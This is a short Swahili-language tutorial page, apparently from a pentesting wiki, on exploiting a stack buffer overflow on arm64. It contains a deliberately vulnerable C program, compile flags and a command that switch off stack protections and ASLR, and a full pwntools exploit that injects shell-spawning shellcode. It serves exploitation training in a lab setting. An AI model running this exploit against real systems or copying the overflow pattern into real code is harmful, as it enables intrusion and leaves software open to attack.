Stack Shellcode - arm64

Reading time: 2 minutes

Pata utangulizi wa arm64 katika:

{{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}}

Code

#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}

Kusanya bila pie, canary na nx:

clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack

No ASLR & No canary - Stack Overflow

Ili kuzuia ASLR tekeleza:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Ili kupata offset ya bof angalia kiungo hiki.

Exploit:

from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode

print("Payload length: "+ str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()

Jambo pekee "gumu" kupata hapa ingekuwa anwani katika stack ya kuita. Katika kesi yangu nilitengeneza exploit na anwani iliyopatikana kwa kutumia gdb, lakini kisha nilipokuwa nikifanya exploit haikufanya kazi (kwa sababu anwani ya stack ilibadilika kidogo).

Nilifungua core file iliyotengenezwa (gdb ./bog ./core) na kuangalia anwani halisi ya mwanzo wa shellcode.